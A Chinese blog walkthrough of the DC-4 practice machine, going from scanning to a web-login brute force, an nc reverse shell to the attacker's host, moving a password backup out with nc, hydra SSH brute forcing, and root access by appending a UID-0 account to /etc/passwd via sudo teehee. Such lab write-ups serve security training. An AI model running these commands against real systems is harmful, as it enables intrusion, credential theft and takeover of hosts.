DC-4靶机渗透实战

DC-4

信息收集

#主机发现

namp -sP 192.168.43.0/24 
arp-scan -l 

#端口探测,服务识别

nmap -sV -p- 192.168.43.7


22,80

#指纹识别

whatweb -v http://192.168.43.7/

#目录扫描

dirsearch -u http://192.168.43.7/ -e php 

 

没什么用

#访问80端口

一个登录框,提示admin........

#BP抓包爆破-登录界面可以RCE

爆破出账户为admin/happy

whoami:www-data ---低权限

#反弹shell

nc -lvnp 8888 BP:nc+-e+/bin/bash+192.168.43.33+8888

 

经过抓包得到:空格 就是 +

#低权限交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

信息搜集一波,/home下有三个账户,只有jim有东西 

#尝试提权

/home/jim

存在三个文件 mbox无权限访问

SUID提权:无果

find / -user root -perm -4000 -print 2\>/dev/null

find / -perm -u\=s -type f 2\>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} ;

-----------提权忘了又复习一边-----------GPT给的解释-------------------------------------

find: 这是Linux系统中用于查找文件和目录的命令。

/: 这是find命令的起始路径,从根目录开始进行搜索 -user root: find命令的一个条件,表示要查找属主为 root的文件。

-perm -4000: find命令的另一个条件,表示要查找具有SUID权限(权限设置为4xxx)的文件。

-print: find命令的一个动作,表示将符合条件的文件路径输出到标准输出(stdout) 2\>/dev/null: 这是将错误输出(stderr)重定向到/dev/null,即将错误信息丢弃,不显示在终端上。

-type f: 文件类型为f

exec ls -ldb {}\; 这是 -exec 选项的一部分,用于标记命令的结束。

/home/jim 存在old-passwords.bak文件 保存至本地

#博主实在萌萌人,scp传不了文件,有大佬能解释下为什么吗

scp /home/jim/backups/old-passwords.bak 192.168.43.33:/home/kali

把old-passwords.bak传出来 ----利用nc

kali

nc -lvnp 2334 > old-passwords.txt

靶机

nc 192.168.43.33 2334 < jim/backups/old-passwords.bak

#ssh爆破登录jim

hydra -l jim -P /home/kali/old-passwords.txt 192.168.43.7 ssh -vV

得到密码:jibril04

​​ssh登录jim​

ssh jim@192.168.43.7

#注意提示:You have mail 

查看mbox cat mbox ---一封text邮箱

cat /var/mail --------得到charles的密码:^xHhA&hvim0y

#登录charles

su charles

#提权

切换用户,sudo -l发现提示:teehee命令可无密码以root权限执行

sudo -l

-Matching Defaults entries for charles on dc-4: - env\_reset, mail\_badpass,

- secure\_path\=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

-User charles may run the following commands on dc-4:

- (root) NOPASSWD: /usr/bin/teehee

echo "test1::0:0:root:/root:/bin/bash"|sudo teehee -a /etc/passwd

you have mail --------!

#cat  /root/flag.txt

  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 4
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值